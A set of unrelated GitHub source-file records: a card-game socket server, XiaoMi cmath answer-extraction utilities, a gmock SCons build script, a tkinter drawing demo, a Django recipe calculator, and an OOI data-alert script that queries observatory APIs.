threading\n\n\nfrom eventhandler import EventHandler\n\n\ndef new_thread(target, daemon=True, args=()):\n    thread = threading.Thread(target=target, args=args, daemon=daemon)\n    thread.start()\n\n\nclass Server:\n\n    def __init__(self):\n\n        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        host = \"192.168.0.178\"\n        port = 12345\n        self.server.bind((host, port))\n        self.server.listen()\n        self.id_count = 0\n        print(\"Server is online\")\n        new_thread(self.receive, daemon=False)\n        self.event = EventHandler(self)\n\n    def receive(self):\n        \"\"\"\n        New client connections\n        \"\"\"\n        while True:\n            client, address = self.server.accept()\n            print(f\"{str(address)} connected!\")\n            self.id_count += 1\n            new_thread(lambda: self.handle(client))\n            
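# send the newly assigned client id back to the connection before registering it
            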
client.send(bytes(str(self.id_count), encoding=\"UTF-8\"))\n\n self.event.add(client, self.id_count)\n\n def handle(self, client):\n \"\"\"\n Handle connected client\n :param client: socket\n \"\"\"\n while True:\n try:\n message = json.loads(client.recv(2048).decode())\n self.event.new(client, message)\n except socket.error:\n # Disconnect\n user = self.event.remove(client)\n client.close()\n print(f\"{user} [{user.get_uid()}] disconnected!\")\n self.event.broadcast_lobby()\n self.event.broadcast_game()\n return\n\n @staticmethod\n def send(client, data):\n \"\"\"\n Send data to client\n :param client: socket client\n :param data: dict\n \"\"\"\n client.send(json.dumps(data).encode(\"UTF-8\"))\n\n\nif __name__ == '__main__':\n server = Server()\n","repo_name":"juhor00/Cardgame","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} {"seq_id":"18320015473","text":"import re\nimport json\n\n\nREG_DIGITS_SINGLETON = re.compile(r\"^\\d+[./]?\\d*%?$\")\nREG_DIGITS_BEGIN = re.compile(r\"^(\\d+[./]?\\d*%?) ?(?=[\\u4e00-\\u9fa5,,。°℃$])\")\nREG_DIGITS_MIDDLE = re.compile(r\"(?<=[\\u4e00-\\u9fa5$::,=≈=->{]) ?(\\d+[./]?\\d*%?) ?(?:[\\u4e00-\\u9fa5,,。°℃$}(]|\\([^\\d\\s]|\\.$)\")\nREG_DIGITS_END = re.compile(r\"(?<=[\\u4e00-\\u9fa5$::=≈=\\->]) ?(\\d+[./]?\\d*%?)$\")\n\nREG_NORM = re.compile(r\"(?<=\\d)[, ](?=\\d)\")\nREG_LATEX_FRAC = re.compile(r'\\\\frac{([^}]+)}{([^}]+)}')\nREG_CN_FRAC = re.compile(r'(\\d+)分之(\\d+)')\n\n\ndef read_jsonl_keys(file: str, keys: list):\n \"\"\"Read the given keys from every line of a jsonl file and return them as a dict\"\"\"\n output_dict = {}\n for f in keys:\n output_dict[f] = []\n\n with open(file, 'r', encoding=\"UTF-8\") as fin:\n for line in fin:\n content = json.loads(line.strip())\n for f in keys:\n if f in content:\n output_dict[f].append(content[f])\n else:\n output_dict[f].append(None)\n return output_dict\n\n\ndef has_exception(answer: str, exception_regs: list = None) -> bool:\n \"\"\"Decide whether a model-generated answer is an error/exception response\"\"\"\n\n if answer is None:\n return True\n\n if len(answer.strip()) == 0:\n return True\n\n reg_timeout = re.compile(\"(请求.*超时)|(timeout)\")\n if bool(re.search(reg_timeout, answer)):\n return True\n\n reg_error = re.compile(\"error|异常|失败|content_filter\")\n\n # the request returned an error or exception\n if \"{\" in answer and \"}\" in answer and (bool(re.search(reg_error, answer))):\n return True\n\n # also honor any caller-supplied exception patterns\n if exception_regs:\n for reg in exception_regs:\n if bool(re.search(reg, answer)):\n return True\n\n return False\n\n\ndef extract_cn_fractal(line):\n \"\"\"Extract Chinese-style fraction expressions (e.g. `五分之三`) from the input string and convert them to Arabic-numeral fractions like `3/5`\"\"\"\n\n res = re.findall(REG_CN_FRAC, line)\n if len(res) != 0:\n return [\"{}/{}\".format(b, a) for a, b in res]\n else:\n return res\n\n\ndef extract_digits_from_line(line):\n \"\"\"Extract all numbers from the input string\"\"\"\n\n res1 = re.findall(REG_DIGITS_BEGIN, line)\n res2 = re.findall(REG_DIGITS_MIDDLE, line)\n res3 = re.findall(REG_DIGITS_END, line)\n res4 = re.findall(REG_DIGITS_SINGLETON, line)\n res_cn_frac = extract_cn_fractal(line)\n concat = res1 + res2 + res_cn_frac + res3 + res4\n candidates = [s.strip() for s in concat]\n return [s for s in candidates if not (s.startswith(\"/\") or s.endswith(\"/\"))]\n\n\ndef extract_digits_prediction(response, truncation=\"t\", exception_regs: list = None):\n \"\"\"Extract candidate answers from a model response\"\"\"\n\n # check whether the response is an error/exception\n if has_exception(response, exception_regs):\n return [\"ERROR\"]\n\n response = REG_LATEX_FRAC.sub(r'\\1/\\2', response)\n response = re.sub(REG_NORM, \"\", response)\n\n candidates = []\n # extract numbers line by line\n for line in response.splitlines():\n candidates += extract_digits_from_line(line)\n\n if truncation is None:\n # keep all candidates without truncation\n res = candidates\n\n elif truncation == \"t\":\n # only keep the last two numbers as the model's likely answer\n if len(candidates) <= 2:\n res = candidates\n else:\n res = candidates[-2:]\n\n elif truncation == \"h\":\n res = candidates[:2]\n\n elif truncation == \"ht\" or truncation == \"th\":\n if len(candidates) < 4:\n res = candidates\n else:\n res = candidates[:2] + candidates[-2:]\n else:\n raise ValueError(\"Illegal truncation argument... Only `h`, `t`, `ht` or None are supported.\")\n return list(set(res))\n\n\ndef string2num(string: str):\n \"\"\"Try to convert a string into a float or an int\"\"\"\n string = string.strip()\n\n if string.endswith(\"%\"):\n string = string.replace(\"%\", \"\")\n return float(string) / 100\n\n if \"/\" in string:\n parts = string.split(\"/\")\n if len(parts) != 2 or float(parts[1]) == 0.0:\n print(\"Warning: {} is illegal!\".format(string))\n return 0\n else:\n return float(parts[0]) / float(parts[1])\n\n if \".\" in string:\n return float(string)\n\n return int(string)\n\n\ndef match_digits(a, b):\n \"\"\"Check whether the numbers a and b are approximately equal\"\"\"\n\n if isinstance(a, int) and isinstance(b, int):\n return a == b\n else:\n relative_diff = abs(a - b) / (min(abs(a), abs(b)) + 1e-6)\n return relative_diff < 1e-2\n\n\ndef match_digit_response(golden, responses: list) -> bool:\n \"\"\"Check whether the gold answer matches any of the extracted answer candidates\"\"\"\n\n if \"ERROR\" in responses:\n return False\n\n if isinstance(golden, str):\n golden = string2num(golden)\n\n for r in responses:\n try:\n num = string2num(r)\n if match_digits(golden, num):\n return True\n except ValueError:\n pass\n return False\n","repo_name":"XiaoMi/cmath","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} {"seq_id":"21265374671","text":"__author__ = 'joi@google.com (Joi Sigurdsson)'\n\n\nimport os\n\n############################################################\n# Environments for building the targets, sorted by name.\n\nImport('env', 'gtest_exports')\n\nGTEST_DIR = env['GTEST_DIR']\n\nGtestObject = gtest_exports['GtestObject']\nGtestBinary = gtest_exports['GtestBinary']\nGtestTest = gtest_exports['GtestTest']\n\ngtest_common_exports = SConscript(GTEST_DIR + '/scons/SConscript.common')\nEnvCreator = gtest_common_exports['EnvCreator']\n\nenv = env.Clone()\nif env['PLATFORM'] == 'win32':\n env.Append(CCFLAGS=[\n '-wd4127', # Disables warning \"conditional expression is constant\",\n # triggered by VC 8.0's own STL header .\n ])\n\n# Note: The relative paths in SConscript files are relative to the location\n# of the SConscript file itself. 
To make a path relative to the location of\n# the main SConstruct file, prepend the path with the # sign.\n#\n# Include paths to gtest headers are relative to either the gmock\n# directory or the 'include' subdirectory of it, and this SConscript\n# file is one directory deeper than the gmock directory.\nenv.Prepend(CPPPATH = ['..', '../include', GTEST_DIR + '/include'])\n\nenv_use_own_tuple = EnvCreator.Create(env, EnvCreator.UseOwnTuple)\nenv_with_exceptions = EnvCreator.Create(env, EnvCreator.WithExceptions)\nenv_without_rtti = EnvCreator.Create(env, EnvCreator.NoRtti)\n\n############################################################\n# Helpers for creating build targets.\n\ndef GmockStaticLibraries(build_env):\n \"\"\"Builds static libraries for gmock and gmock_main in build_env.\n\n Args:\n build_env: An environment in which to build libraries.\n\n Returns:\n A pair (gmock_library, gmock_main_library) built in the build_env\n environment.\n \"\"\"\n\n gmock_object = GtestObject(build_env, '../src/gmock-all.cc')\n gmock_main_object = GtestObject(build_env, '../src/gmock_main.cc')\n\n return (build_env.StaticLibrary(target='gmock' + build_env['OBJ_SUFFIX'],\n source=[gmock_object]),\n build_env.StaticLibrary(target='gmock_main' + build_env['OBJ_SUFFIX'],\n source=[gmock_object, gmock_main_object]))\n\n\n############################################################\n# Object and library targets.\n\ngtest = gtest_exports['gtest']\ngtest_ex = gtest_exports['gtest_ex']\ngtest_no_rtti = gtest_exports['gtest_no_rtti']\ngtest_use_own_tuple = gtest_exports['gtest_use_own_tuple']\n\n# gmock.lib to be used by most apps (if you have your own main function).\n# gmock_main.lib can be used if you just want a basic main function; it is\n# also used by some tests for Google Test itself.\ngmock, gmock_main = GmockStaticLibraries(env)\ngmock_ex, gmock_main_ex = GmockStaticLibraries(env_with_exceptions)\ngmock_no_rtti, gmock_main_no_rtti = GmockStaticLibraries(env_without_rtti)\ngmock_use_own_tuple, gmock_main_use_own_tuple = GmockStaticLibraries(\n env_use_own_tuple)\n\n# Install the libraries if needed.\nif 'LIB_OUTPUT' in env.Dictionary():\n env.Install('$LIB_OUTPUT', source=[gmock, gmock_main,\n gmock_ex, gmock_main_ex,\n gmock_no_rtti, gmock_main_no_rtti,\n gmock_use_own_tuple,\n gmock_main_use_own_tuple])\n\n#############################################################\n# Test targets using the standard environment.\nGtestTest(env, 'gmock-actions_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-cardinalities_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-generated-actions_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-generated-function-mockers_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-generated-internal-utils_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-generated-matchers_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-internal-utils_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-matchers_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-more-actions_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-nice-strict_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-port_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-spec-builders_test', [gtest, gmock_main])\nGtestTest(env, 'gmock_leak_test_', [gtest, gmock_main])\nGtestTest(env, 'gmock_link_test', [gtest, gmock_main],\n ['../test/gmock_link2_test.cc'])\nGtestTest(env, 'gmock_output_test_', [gtest, gmock])\n#GtestTest(env, 'gmock_stress_test', [gtest, gmock])\nGtestTest(env, 'gmock_test', [gtest, gmock_main])\n# 
gmock_all_test is commented to save time building and running tests.\n# Uncomment if necessary.\n#GtestTest(env, 'gmock_all_test', [gtest, gmock_main])\n\n############################################################\n# Test targets using custom environments.\nGtestBinary(env_with_exceptions,\n 'gmock-more-actions-ex_test',\n [gtest_ex, gmock_main_ex],\n ['../test/gmock-more-actions_test.cc'])\n\nGtestBinary(env_without_rtti,\n 'gmock_no_rtti_test',\n [gtest_no_rtti, gmock_main_no_rtti],\n ['../test/gmock-spec-builders_test.cc'])\n\nGtestBinary(env_use_own_tuple,\n 'gmock_use_own_tuple_test',\n [gtest_use_own_tuple, gmock_main_use_own_tuple],\n ['../test/gmock-spec-builders_test.cc'])\n","repo_name":"Sigil-Ebook/flightcrew","sub_path":"src/googlemock/scons/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"72"} {"seq_id":"259732256","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 23 17:16:08 2018\n\n@author: anna\n\"\"\"\n\nfrom tkinter import Tk, Canvas\n\nmaster = Tk()\n\nw = Canvas(master, width=200, height=100,bd=0,highlightthickness=0)\nw.configure(bg=\"purple\")\nw.pack()\n\nw.create_line(100, 100, 0, 0, fill=\"pink\")\nw.create_line(100, 0, 0, 0, fill=\"red\")\nmaster.mainloop()","repo_name":"duyt1001/SciFair2018","sub_path":"tkinterline.py","file_name":"tkinterline.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"19339530950","text":"from django.shortcuts import render\n\nDATA = {\n 'omlet': {\n 'яйца, шт': 2,\n 'молоко, л': 0.1,\n 'соль, ч.л.': 0.5,\n },\n 'pasta': {\n 'макароны, г': 0.3,\n 'сыр, г': 0.05,\n },\n 'buter': {\n 'хлеб, ломтик': 1,\n 'колбаса, ломтик': 1,\n 'сыр, ломтик': 1,\n 'помидор, ломтик': 1,\n },\n # feel free to add your own recipes ;)\n}\ndef index(request):\n return render(request, 'calculator/index.html')\ndef omlet(request):\n # if the servings parameter is supplied, use it as the multiplier; otherwise default to 1\n if request.GET.get('servings') == None:\n quan = 1\n else:\n quan = int(request.GET.get('servings'))\n recipe = {}\n recipe.update(DATA[request.path.strip('/')])\n for names, amount in recipe.items():\n recipe[names] = amount * quan\n context = {\n 'recipe': recipe\n }\n return render(request=request, template_name='calculator/index.html', context=context)\n# Write your handler here. Use DATA as the data source\n# The result should be render(request, 'calculator/index.html', context)\n# The context must be a dict holding the recipe:\n# context = {\n# 'recipe': {\n# 'ingredient1': amount1,\n# 'ingredient2': amount2,\n# }\n# }\n","repo_name":"Wooft/00_django_homework","sub_path":"1.2-requests-templates/recipes/calculator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"72833107432","text":"import requests\nfrom requests.packages.urllib3.util.retry import Retry\nimport datetime\nimport pandas as pd\nimport concurrent.futures\nimport logging\nfrom math import isnan\nimport gc\nimport os\nimport glob\nimport json\nimport pickle as pk\nfrom copy import deepcopy\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom jinja2 import Environment\nimport netCDF4 as nc\nimport numpy as np\nfrom sys import getsizeof\n\nQC_PARAMETER_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12578/qcparameters/'\nANNOTATIONS_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12580/anno/find?'\nDEPLOYEMENT_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12587/events/deployment/inv/'\nDATA_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12576/sensor/inv/'\nDATA_TEAM_PORTAL_URL = 'http://ooi.visualocean.net/data-streams/science/'\n\n# out_dir = '/home/knuth/ooi_stats/alerts/output/'\nout_dir = '/Users/knuth/Documents/ooi/repos/github/ooi_stats/alerts/output/'\n\nvirtual_times = ['time','met_timeflx','botsflu_time15s','botsflu_time24h']\nCE_cabled = [\"CE02SHBP\", \"CE04OSBP\", \"CE04OSPS\"]\n\nntp_epoch = datetime.datetime(1900, 1, 1)\nunix_epoch = datetime.datetime(1970, 1, 1)\nntp_delta = (unix_epoch - ntp_epoch).total_seconds()\n\npool = concurrent.futures.ThreadPoolExecutor(max_workers=20)\nsession = requests.session()\nretry = Retry(total=10, backoff_factor=0.3,)\nadapter = requests.adapters.HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=retry, pool_block=True)\nsession.mount('https://', adapter)\n\n\n\ndef request_data(url,username,token):\n auth = (username, token)\n return session.get(url,auth=auth)\n\ndef to_integer(dt_time):\n return 10000*dt_time.year + 100*dt_time.month + dt_time.day\n\ndef diff_days(d1,d2):\n return (d2 - d1).days\n\ndef create_dir(new_dir):\n # Check if dir exists.. if it doesn't... 
create it.\n if not os.path.isdir(new_dir):\n try:\n os.makedirs(new_dir)\n except OSError:\n if os.path.exists(new_dir):\n pass\n else:\n raise\n\ndef get_most_recent(array):\n try:\n param_dir = out_dir + array+'/'+'param'+'/*'\n stream_dir = out_dir + array+'/'+'stream'+'/*'\n method_dir = out_dir + array+'/'+'method'+'/*'\n refdes_dir = out_dir + array+'/'+'refdes'+'/*'\n\n param_list_of_files = glob.glob(param_dir)\n stream_list_of_files = glob.glob(stream_dir)\n method_list_of_files = glob.glob(method_dir)\n refdes_list_of_files = glob.glob(refdes_dir)\n\n\n param_latest_file = max(param_list_of_files, key=os.path.getctime)\n stream_latest_file = max(stream_list_of_files, key=os.path.getctime)\n method_latest_file = max(method_list_of_files, key=os.path.getctime)\n refdes_latest_file = max(refdes_list_of_files, key=os.path.getctime)\n\n with open(param_latest_file, 'rb') as f:\n param_most_recent = pk.load(f)\n with open(stream_latest_file, 'rb') as f:\n stream_most_recent = pk.load(f)\n with open(method_latest_file, 'rb') as f:\n method_most_recent = pk.load(f)\n with open(refdes_latest_file, 'rb') as f:\n refdes_most_recent = pk.load(f)\n\n return param_most_recent, stream_most_recent, method_most_recent, refdes_most_recent\n\n except:\n param_most_recent = pd.DataFrame(columns =['refdes','method','stream','parameter'])\n stream_most_recent = pd.DataFrame(columns =['refdes','method','stream'])\n method_most_recent = pd.DataFrame(columns =['refdes','method_type'])\n refdes_most_recent = pd.DataFrame(columns =['refdes'])\n\n return param_most_recent, stream_most_recent, method_most_recent, refdes_most_recent\n\n\n\n\n\n\n\ndef request_gr(username, token):\n print(\"requesting qc data...\")\n r = requests.get(QC_PARAMETER_URL, auth=(username, token))\n data = r.json()\n\n refdes_qc_list = []\n parameter_qc_list = []\n globalrange_min_qc_list = []\n\n for i in range(len(data)):\n if data[i]['qcParameterPK']['qcId'] == 'dataqc_globalrangetest_minmax' \\\n and data[i]['qcParameterPK']['parameter'] == 'dat_min':\n \n refdes = data[i]['qcParameterPK']['refDes']['subsite']+'-'+\\\n data[i]['qcParameterPK']['refDes']['node']+'-'+\\\n data[i]['qcParameterPK']['refDes']['sensor']\n refdes_qc_list.append(refdes)\n \n parameter = data[i]['qcParameterPK']['streamParameter']\n parameter_qc_list.append(parameter)\n \n globalrange_min = data[i]['value']\n globalrange_min_qc_list.append(globalrange_min)\n\n qc_dict = {\n 'refdes':refdes_qc_list,\n 'parameter':parameter_qc_list,\n 'global_range_min':globalrange_min_qc_list,\n } \n \n globalrange_min_qc_data = pd.DataFrame(qc_dict,columns=['refdes','parameter','global_range_min'])\n\n refdes_qc_list = []\n parameter_qc_list = []\n globalrange_max_qc_list = []\n\n for i in range(len(data)):\n if data[i]['qcParameterPK']['qcId'] == 'dataqc_globalrangetest_minmax' \\\n and data[i]['qcParameterPK']['parameter'] == 'dat_max':\n \n refdes = data[i]['qcParameterPK']['refDes']['subsite']+'-'+\\\n data[i]['qcParameterPK']['refDes']['node']+'-'+\\\n data[i]['qcParameterPK']['refDes']['sensor']\n refdes_qc_list.append(refdes)\n \n parameter = data[i]['qcParameterPK']['streamParameter']\n parameter_qc_list.append(parameter)\n \n globalrange_max = data[i]['value']\n globalrange_max_qc_list.append(globalrange_max)\n\n qc_dict = {\n 'refdes':refdes_qc_list,\n 'parameter':parameter_qc_list,\n 'global_range_max':globalrange_max_qc_list,\n } \n \n globalrange_max_qc_data = pd.DataFrame(qc_dict,columns=['refdes','parameter','global_range_max'])\n\n global_ranges = 
pd.merge(globalrange_min_qc_data,globalrange_max_qc_data, on=['refdes','parameter'], how='outer')\n\n return global_ranges\n\n\n\n\n\n\ndef check_sci_v_gr(array, global_ranges,request_inputs):\n print(\" checking science classifications vs what has global range qc values...\")\n ranges = global_ranges[['refdes','parameter']].drop_duplicates()\n \n if array == 'CE':\n ranges = ranges[ranges.refdes.str.contains('|'.join(CE_cabled))==False]\n ranges = ranges[ranges.refdes.str.startswith(array)]\n\n if array == 'RS':\n ranges_temp = ranges[ranges.refdes.str.contains('|'.join(CE_cabled))]\n ranges_temp2 = ranges[ranges.refdes.str.startswith(array)]\n ranges = pd.concat([ranges_temp,ranges_temp2])\n\n expected = request_inputs[['refdes','parameter']].drop_duplicates()\n not_found = ranges.merge(expected,indicator=True, how='outer')\n missing_gr_qc_values = not_found[not_found['_merge'] == 'right_only']\n del missing_gr_qc_values['_merge']\n missing_science_classification = not_found[not_found['_merge'] == 'left_only']\n del missing_science_classification['_merge']\n \n return missing_gr_qc_values , missing_science_classification\n\n\n\n\n\ndef request_annotations(array, username, token):\n beginDT = int(nc.date2num(datetime.datetime.strptime(\"2012-01-01T01:00:01Z\",'%Y-%m-%dT%H:%M:%SZ'),'seconds since 1970-01-01')*1000)\n endDT = int(nc.date2num(datetime.datetime.utcnow(),'seconds since 1970-01-01')*1000) \n\n refdes_in = DATA_TEAM_PORTAL_URL + array\n refdes_list = pd.read_csv(refdes_in)\n refdes_list = refdes_list[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_list.columns = ['refdes','method', 'stream','parameter']\n refdes_list = refdes_list['refdes']\n\n # added regex search to exclude or grab cabled cabled assets to produce complete Endurance and Cabled Array outputs\n if array == 'CE':\n refdes_list = refdes_list[refdes_list.str.contains('|'.join(CE_cabled))==False]\n\n if array == 'RS':\n refdes_in_CE = DATA_TEAM_PORTAL_URL + 'CE'\n refdes_list_CE = pd.read_csv(refdes_in_CE)\n refdes_list_CE = refdes_list_CE[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_list_CE.columns = ['refdes','method', 'stream','parameter']\n refdes_list_CE = refdes_list_CE['refdes']\n refdes_list_CE = refdes_list_CE[refdes_list_CE.str.contains('|'.join(CE_cabled))]\n refdes_list = pd.concat([refdes_list_CE,refdes_list])\n\n refdes_list = refdes_list.drop_duplicates()\n\n print(\" building annotation info requests...\")\n anno_requests = []\n for i in refdes_list:\n request_url = ANNOTATIONS_URL+'beginDT='+str(beginDT)+'&endDT='+str(endDT)+'&refdes='+i\n anno_requests.append(request_url)\n \n print(\" sending annotation info requests...\")\n ref_des_list = []\n future_to_url = {pool.submit(request_data, url, username, token): url for url in anno_requests}\n for future in concurrent.futures.as_completed(future_to_url):\n url_rf = future_to_url[future]\n try:\n anno_info = future.result()\n anno_info = anno_info.json()\n \n for i in range(len(anno_info)):\n if anno_info[i]['endDT'] is None and anno_info[i]['qcFlag'] == 'not_operational':\n refdes = url_rf[111:]\n ref_des_list.append(refdes)\n except:\n pass\n\n \n data_dict={\n 'refdes':ref_des_list}\n\n not_operational = pd.DataFrame(data_dict, columns = ['refdes'])\n\n return not_operational\n\n\n\n\n\n\ndef alert_request_deployments(array, username, token):\n refdes_in = DATA_TEAM_PORTAL_URL + array\n refdes_list = pd.read_csv(refdes_in)\n refdes_list = refdes_list[['reference_designator','method', 
'stream_name','parameter_name']]\n refdes_list.columns = ['refdes','method', 'stream','parameter']\n refdes_list = refdes_list['refdes']\n\n # added regex search to exclude or grab cabled cabled assets to produce complete Endurance and Cabled Array outputs\n if array == 'CE':\n refdes_list = refdes_list[refdes_list.str.contains('|'.join(CE_cabled))==False]\n\n if array == 'RS':\n refdes_in_CE = DATA_TEAM_PORTAL_URL + 'CE'\n refdes_list_CE = pd.read_csv(refdes_in_CE)\n refdes_list_CE = refdes_list_CE[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_list_CE.columns = ['refdes','method', 'stream','parameter']\n refdes_list_CE = refdes_list_CE['refdes']\n refdes_list_CE = refdes_list_CE[refdes_list_CE.str.contains('|'.join(CE_cabled))]\n refdes_list = pd.concat([refdes_list_CE,refdes_list])\n\n refdes_list = refdes_list.drop_duplicates()\n\n print(\"working on\", array)\n print(\" building deployment info requests...\")\n asset_requests = []\n for i in refdes_list:\n sub_site = i[:8]\n platform = i[9:14]\n instrument = i[15:27]\n asset_url_inputs = '/'.join((sub_site, platform, instrument))\n request_url = DEPLOYEMENT_URL+asset_url_inputs+'/-1'\n asset_requests.append(request_url)\n\n print(\" sending deployment info requests...\")\n ref_des_list = []\n start_time_list = []\n deployment_list = []\n\n start_time = datetime.datetime.utcnow() - datetime.timedelta(seconds=86400)\n\n future_to_url = {pool.submit(request_data, url, username, token): url for url in asset_requests}\n for future in concurrent.futures.as_completed(future_to_url):\n try:\n asset_info = future.result()\n asset_info = asset_info.json()\n\n for i in range(len(asset_info)):\n if asset_info[i]['eventStopTime'] is None:\n refdes = asset_info[i]['referenceDesignator']\n ref_des_list.append(refdes)\n \n deployment = asset_info[i]['deploymentNumber']\n deployment_list.append(deployment)\n start_time_list.append(start_time)\n except:\n pass\n \n data_dict={\n 'refdes':ref_des_list,\n 'deployment':deployment_list,\n 'start_time':start_time_list}\n\n alert_deployment_data = pd.DataFrame(data_dict, columns = ['refdes', 'deployment','start_time'])\n\n return alert_deployment_data\n\n\n\n\n\n\n\ndef alert_build_requests(array, alert_deployment_data):\n print(\" building data request urls...\")\n\n refdes_streams = DATA_TEAM_PORTAL_URL + array\n refdes_streams_df = pd.read_csv(refdes_streams)\n refdes_streams_df = refdes_streams_df[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_streams_df.columns = ['refdes','method', 'stream','parameter']\n refdes_streams_df = refdes_streams_df[refdes_streams_df['method'].str.contains(\"recovered\")==False]\n\n # regex search to exclude or grab cabled cabled assets to produce complete Endurance and Cabled Array outputs\n if array == 'CE':\n refdes_streams_df = refdes_streams_df[refdes_streams_df['refdes'].str.contains('|'.join(CE_cabled))==False]\n\n if array == 'RS':\n refdes_streams_CE = DATA_TEAM_PORTAL_URL + 'CE'\n refdes_streams_df_CE = pd.read_csv(refdes_streams_CE)\n refdes_streams_df_CE = refdes_streams_df_CE[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_streams_df_CE.columns = ['refdes','method', 'stream','parameter']\n refdes_streams_df_CE = refdes_streams_df_CE[refdes_streams_df_CE['method'].str.contains(\"recovered\")==False]\n refdes_streams_df_CE = refdes_streams_df_CE[refdes_streams_df_CE['refdes'].str.contains('|'.join(CE_cabled))]\n refdes_streams_df = 
pd.concat([refdes_streams_df_CE,refdes_streams_df])\n\n refdes_streams_df = refdes_streams_df.drop_duplicates()\n\n request_inputs = pd.merge(refdes_streams_df,alert_deployment_data, on='refdes')\n\n request_inputs['subsite'] = request_inputs.refdes.str[:8]\n request_inputs['platform'] = request_inputs.refdes.str[9:14]\n request_inputs['instrument'] = request_inputs.refdes.str[15:27]\n request_inputs['date'] = pd.to_datetime(request_inputs['start_time'])\n request_inputs['date'] = request_inputs.date.dt.strftime('%Y-%m-%dT%H:%M:%S.000Z')\n\n\n request_inputs['urls'] = DATA_URL+\\\n request_inputs.subsite+\\\n '/'+request_inputs.platform+\\\n '/'+request_inputs.instrument+\\\n '/'+request_inputs.method+\\\n '/'+request_inputs.stream+\\\n '?beginDT='+request_inputs.date+\\\n '&limit=1000'\n\n request_urls = request_inputs['urls'].drop_duplicates()\n request_urls = request_urls.values.tolist()\n\n return request_urls , request_inputs\n\n\n\n\n\n\n\n\n\ndef send_gr_data_requests(array,request_urls,global_ranges,username,token):\n\n print(' sending data requests...')\n \n\n ooi_parameter_data_gr = pd.DataFrame()\n missing = []\n\n future_to_url = {pool.submit(request_data, url, username, token): url for url in request_urls}\n for future in concurrent.futures.as_completed(future_to_url):\n # url = future_to_url[future]\n try:\n data = future.result() \n data = data.json()\n\n refdes_list = []\n parameter_list = []\n method_list = []\n stream_list = []\n timestamp_list = []\n value_list = []\n \n # use this to speed up the loop\n # df = pd.DataFrame.from_records(map(json.loads, map(json.dumps,data)))\n\n refdes = data[-1]['pk']['subsite'] + '-' + data[-1]['pk']['node'] + '-' + data[-1]['pk']['sensor']\n method = data[-1]['pk']['method']\n stream = data[-1]['pk']['stream']\n\n y = global_ranges[global_ranges['refdes'] == refdes]\n\n for i in range(len(data)):\n for ts in virtual_times:\n # print('yes')\n try:\n timestamp = data[i][ts]\n timestamp = datetime.datetime.utcfromtimestamp(timestamp - ntp_delta).replace(microsecond=0)\n timestamp = timestamp.date()\n refdes_list.append(refdes)\n method_list.append(method)\n stream_list.append(stream)\n parameter_list.append(ts)\n value_list.append(data[i][ts])\n timestamp_list.append(timestamp)\n except:\n continue\n \n if y.empty:\n missing.append(refdes)\n continue\n\n else:\n for var in y.parameter.values:\n for j in data[i].keys():\n if var == j:\n z = data[i][j]\n # conditional to handle 2d datasets, in which case the first non nan value is checked\n if type(z) != list:\n refdes_list.append(refdes)\n method_list.append(method)\n stream_list.append(stream)\n parameter_list.append(var)\n value_list.append(z)\n timestamp_list.append(timestamp)\n else:\n u = next(u for u in z if not isnan(u))\n refdes_list.append(refdes)\n method_list.append(method)\n stream_list.append(stream)\n parameter_list.append(var)\n value_list.append(u)\n timestamp_list.append(timestamp)\n\n # create data frame from lists collected above\n data_dict = {\n 'refdes':refdes_list,\n 'method':method_list,\n 'stream':stream_list,\n 'parameter':parameter_list,\n 'value':value_list,\n 'date':timestamp_list}\n response_data = pd.DataFrame(data_dict, columns = ['refdes','method','stream','parameter','value','date'])\n \n # subset to mode time stamp of response to omit data returned outside time range (day) requested\n response_data = response_data.loc[response_data['date'] == response_data['date'].mode()[0]]\n\n for ts in virtual_times:\n if ts in response_data['parameter'].values:\n 
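# added note: the count of timestamp rows serves as the day's total sample size for the percent calculation below\n 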
